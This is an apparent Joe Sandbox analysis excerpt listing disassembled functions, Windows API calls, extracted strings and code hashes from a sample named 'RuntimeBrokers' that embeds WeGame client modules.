                                        • String ID: d:\ci_dev\wegame_client\codes\common\src\cfg_file_model.cpp$std exception in copy_if_notexist: %1%
                                        • API String ID: 1369574949-528307446
                                        • Opcode ID: 351279b71c90012e1e803ed7be563a94f94a83ac4c03f95cb5f24a2e468c8864
                                        • Instruction ID: 1f44887ba32370d71e1675abce88cf17f697d89320c4196ed24500708c5f1105
                                        • Opcode Fuzzy Hash: 351279b71c90012e1e803ed7be563a94f94a83ac4c03f95cb5f24a2e468c8864
                                        • Instruction Fuzzy Hash: B3115831941118AFDB11DBA4CD64FDDB7B4AF59308F2081D8D1056BA80EB3AAF09DB92
                                        Function 6C0E6253 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C0E4133: __EH_prolog3.LIBCMT ref: 6C0E413A
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0E62A3
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\cfg_file.cpp, xrefs: 6C0E62C7
                                        • std exception in cfg_folder_appdata: %1%, xrefs: 6C0E6253
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3$?get_log_instance@base@@Logger@1@
                                        • String ID: d:\ci_dev\wegame_client\codes\common\src\cfg_file.cpp$std exception in cfg_folder_appdata: %1%
                                        • API String ID: 1369574949-2956762213
                                        • Opcode ID: 8dcf7af19149db03a32b8ef5fc2a5d7770a6966ddc72feaf3fde72ee8873452d
                                        • Instruction ID: 8017767abebd37e0cd909ae89c0ce648b34df406efb2ee6f075cff11e87eb4e4
                                        • Opcode Fuzzy Hash: 8dcf7af19149db03a32b8ef5fc2a5d7770a6966ddc72feaf3fde72ee8873452d
                                        • Instruction Fuzzy Hash: 3F116A31940118AFDB14DBA8C955BDD77F4AF19708F108098E641BBA81EB35AE0DCF92
                                        Function 0049224B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 00492277
                                        • GetCurrentProcessId.KERNEL32(00000000), ref: 0049227E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID: [P%d][T%d]%s
                                        • API String ID: 2063062207-1991590529
                                        • Opcode ID: 02157ae6ad156c8c5bf93911416d1e30961a5d8d7253cdf0efc0c235103d1a2e
                                        • Instruction ID: 0a3ad27e3dcdb3e873fa317f4e8cc81d118ed793ac6ea031ed03630f30df079c
                                        • Opcode Fuzzy Hash: 02157ae6ad156c8c5bf93911416d1e30961a5d8d7253cdf0efc0c235103d1a2e
                                        • Instruction Fuzzy Hash: A3119E75940208BFDF50EF65DC46F997BF8FF18304F0080A5BA48A6191EB349A98DF95
                                        Function 6C166E24 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3_
                                        • String ID: main_thread_tick$system_event
                                        • API String ID: 2427045233-3037755782
                                        • Opcode ID: 0a55d361d13294d5853df41553bc4582aca029bfae8370b1cd835c62694857d2
                                        • Instruction ID: 242110c5eb0a368490af5144ef529902a7b25ba1794cea1e1a37d9ed5ea2d7e4
                                        • Opcode Fuzzy Hash: 0a55d361d13294d5853df41553bc4582aca029bfae8370b1cd835c62694857d2
                                        • Instruction Fuzzy Hash: 43019E3190060CABDF01DFE0C5447EEB7B1AF15318F144109E411BBA80EBB96B5BCB51
                                        Function 6C156E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.VCRUNTIME140(?,00000000,00000044), ref: 6C156EAF
                                        • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 6C156EE2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: CreateProcessmemset
                                        • String ID: D
                                        • API String ID: 2296119082-2746444292
                                        • Opcode ID: 6cde0e002100154ebc3ecbb9ecdf058633bf4bd6eedce597b61c0c7fbd2f3292
                                        • Instruction ID: ecd43fd70cf9e43f2555ef7ccfe65b8c406eada12fb08740346d07046c0baf3d
                                        • Opcode Fuzzy Hash: 6cde0e002100154ebc3ecbb9ecdf058633bf4bd6eedce597b61c0c7fbd2f3292
                                        • Instruction Fuzzy Hash: 3DF0FEB1600508BFEB44DBE8DC89EAB777DEB04748F004428E316DA154E6749D188A66
                                        Function 6C0CA800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID: x4l$x3l
                                        • API String ID: 431132790-1627264033
                                        • Opcode ID: 6259395d98363c9c4c791f33f225c2ebce0729b8f53cdaa61a2463492145676a
                                        • Instruction ID: 982f1eaa9f852137e80207f9d196c9c107ea421f330428a50f2c929390192f56
                                        • Opcode Fuzzy Hash: 6259395d98363c9c4c791f33f225c2ebce0729b8f53cdaa61a2463492145676a
                                        • Instruction Fuzzy Hash: 0111397660075ADFCB04CF64C485B9DBBF0BF45328F10825AD9545BBA0D770AA09CF80
                                        Function 6C0CA88B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID: x4l$x3l
                                        • API String ID: 431132790-1627264033
                                        • Opcode ID: 32714c730ef52721d3e119da6dc2713cd7a71f90da72565f8f5f1a57b8148b8c
                                        • Instruction ID: 1d829b28f6d4284ba2b07e08a06b2d80dc7cf0b55b2d3ad0437c9817c14f5846
                                        • Opcode Fuzzy Hash: 32714c730ef52721d3e119da6dc2713cd7a71f90da72565f8f5f1a57b8148b8c
                                        • Instruction Fuzzy Hash: E9115B76600759EFC714CF64C485B9DBBF0BF45328F10825AD8585BB90D730AA09CF80
                                        Function 6C0CAA15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID: x3l$x3l
                                        • API String ID: 431132790-3170766652
                                        • Opcode ID: b0e15afa5657a84cd8139dc09722781a4699b4f646c24ed3b926905942175a30
                                        • Instruction ID: bb7355642dc73d6c878185aba9694980ae173e788deb1678f36de211f2446efe
                                        • Opcode Fuzzy Hash: b0e15afa5657a84cd8139dc09722781a4699b4f646c24ed3b926905942175a30
                                        • Instruction Fuzzy Hash: B0115B76601755AFCB04CF54C585B9DBBF0BF49328F208259E9546BF90CB70AA48CF80
                                        Function 6C0CAB14 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID: 84l$x3l
                                        • API String ID: 431132790-3065384398
                                        • Opcode ID: 6d18d8c1b8f685c9d74e8d5cbe2f0dc28363ffa65295f25e1395fc1af4cabfb7
                                        • Instruction ID: 8a6f210255c4a7b695b7a9f8316aaf5d5bcc481d5755e74d1e2f5030fa3a08af
                                        • Opcode Fuzzy Hash: 6d18d8c1b8f685c9d74e8d5cbe2f0dc28363ffa65295f25e1395fc1af4cabfb7
                                        • Instruction Fuzzy Hash: 4911397A60076A9FC714CF64C486B9EBBF0BF55318F10825ED9555BB90C771AA09CF80
                                        Function 6C0CAB9F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID: 84l$x3l
                                        • API String ID: 431132790-3065384398
                                        • Opcode ID: 3b3a30a05ae24d3dd79dc346b1def1915870462b6d213dbcc02627e35c8e4817
                                        • Instruction ID: cc2aee5ed95b86860183d7ce79847356638d432008024d0f518ea235478cfa6e
                                        • Opcode Fuzzy Hash: 3b3a30a05ae24d3dd79dc346b1def1915870462b6d213dbcc02627e35c8e4817
                                        • Instruction Fuzzy Hash: E211397A60066AAFC714CF64C486B9EBBF0BF55318F10825AD9555BB90C771AA09CF80
                                        Function 6C0BEA24 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C0BEA2B
                                          • Part of subcall function 6C0B38A0: memset.VCRUNTIME140(?,?,?), ref: 6C0B38C9
                                        • ?_Winerror_message@std@@YAKKPADK@Z.MSVCP140(?,?,00007FFF,?,?,?,00007FFF,00000000,00000004), ref: 6C0BEA6E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3Winerror_message@std@@memset
                                        • String ID: unknown error
                                        • API String ID: 49990987-3078798498
                                        • Opcode ID: 0937be3a9af0c8889a01bd6566208642bb542e1e8eead3084f1c5a2ed430e65d
                                        • Instruction ID: 2a97079207021f0a87753d40cf96d74ad8e8b651b841b07fc5f36d129d08314f
                                        • Opcode Fuzzy Hash: 0937be3a9af0c8889a01bd6566208642bb542e1e8eead3084f1c5a2ed430e65d
                                        • Instruction Fuzzy Hash: 3E01D6B4B003149BDB10DFD98840B9EBAF8BF55704F50052DE444A7B40C7759E498BD1
                                        Function 004280D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID: ;B$;B
                                        • API String ID: 2931989736-1827952031
                                        • Opcode ID: 86e45045e5b6b40667b501a738e671090d9ca5c3e75083ecdacf7946458c3359
                                        • Instruction ID: 166c6e5bb7ba619b59d665ce4923969e30fb82e80fe8b674d54a95c164e899b9
                                        • Opcode Fuzzy Hash: 86e45045e5b6b40667b501a738e671090d9ca5c3e75083ecdacf7946458c3359
                                        • Instruction Fuzzy Hash: 8C01D675D0429E9FCF01CFE8D8416EEBFF0AF18204F04449AD864A3302D3359A15CBA1
                                        Function 6C0A396B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0A3972
                                          • Part of subcall function 6C0AA8F0: memmove.VCRUNTIME140(?,?,6C0B5839,?,?,00000000,?,?,6C0B5839,?,?), ref: 6C0AA917
                                          • Part of subcall function 6C1C3AA0: __onexit.LIBCMT ref: 6C1C3AA6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3___onexitmemmove
                                        • String ID: IScript_adapter$IScript_adapter
                                        • API String ID: 2490025381-2155091468
                                        • Opcode ID: a52cabe34c5a4464d0ab70003d8a6f9650e131861054548515d2fb0b08f5a02f
                                        • Instruction ID: 4fcf5958aa12db711f8f2eab73433b236cba49efcea0b0e1cbfdc1d70fe31ab2
                                        • Opcode Fuzzy Hash: a52cabe34c5a4464d0ab70003d8a6f9650e131861054548515d2fb0b08f5a02f
                                        • Instruction Fuzzy Hash: 90F0C271A002489FCB40DFE5C481BDDBBB0BB29210F60242ED109BBB81DB3E4649CF51
                                        Function 6C0A2DEF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0A2DF6
                                          • Part of subcall function 6C0AA8F0: memmove.VCRUNTIME140(?,?,6C0B5839,?,?,00000000,?,?,6C0B5839,?,?), ref: 6C0AA917
                                          • Part of subcall function 6C1C3AA0: __onexit.LIBCMT ref: 6C1C3AA6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3___onexitmemmove
                                        • String ID: ITrack_mgr$ITrack_mgr
                                        • API String ID: 2490025381-376113704
                                        • Opcode ID: 29f4341d8cdcf83506f64ef9d51120b52c4d5ddbc0d1949a85bac24520b98360
                                        • Instruction ID: 2b5aa20ae562806cffa0e032af8a562af04e436f2c7bcd6ced3d7811b4e40e0d
                                        • Opcode Fuzzy Hash: 29f4341d8cdcf83506f64ef9d51120b52c4d5ddbc0d1949a85bac24520b98360
                                        • Instruction Fuzzy Hash: 98F06271A003589FCB00DFD584817DDFB70AB59328FA0256FD105BBAD1D7348A4A8F65
                                        Function 6C0A2E63 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0A2E6A
                                          • Part of subcall function 6C0AA8F0: memmove.VCRUNTIME140(?,?,6C0B5839,?,?,00000000,?,?,6C0B5839,?,?), ref: 6C0AA917
                                          • Part of subcall function 6C1C3AA0: __onexit.LIBCMT ref: 6C1C3AA6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3___onexitmemmove
                                        • String ID: ITpf_ui$ITpf_ui
                                        • API String ID: 2490025381-4268338667
                                        • Opcode ID: 271fd46ad3ddf8094543ea2d17601a48370c0fa9cdcdcd0a51cb7716561d3afe
                                        • Instruction ID: 02e73e28cedc91a528464646cff2e6c4c695ef3ef1c275370607b71efead9718
                                        • Opcode Fuzzy Hash: 271fd46ad3ddf8094543ea2d17601a48370c0fa9cdcdcd0a51cb7716561d3afe
                                        • Instruction Fuzzy Hash: E9F04471E002499FCB00DFE5C4817DCBA70AB19228FA4146FD109ABAD1D7349A498F69
                                        Function 6C0A2F5D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0A2F64
                                          • Part of subcall function 6C0AA8F0: memmove.VCRUNTIME140(?,?,6C0B5839,?,?,00000000,?,?,6C0B5839,?,?), ref: 6C0AA917
                                          • Part of subcall function 6C1C3AA0: __onexit.LIBCMT ref: 6C1C3AA6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3___onexitmemmove
                                        • String ID: DEBUG$DEBUG
                                        • API String ID: 2490025381-3630546843
                                        • Opcode ID: e745090cb66acee00b1efb4fb087ea789c427e8a516bd83990446f494b09a440
                                        • Instruction ID: 3f6b611c016b160c38cd96dfb149a530bfabc6ed4fa4293581157fd3a50f0918
                                        • Opcode Fuzzy Hash: e745090cb66acee00b1efb4fb087ea789c427e8a516bd83990446f494b09a440
                                        • Instruction Fuzzy Hash: BDF06D71E002099FCB04DFE5C985AEDFBB1BB59214FA0102FD109BBB80D73886899F55
                                        Function 6C0A2FCD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0A2FD4
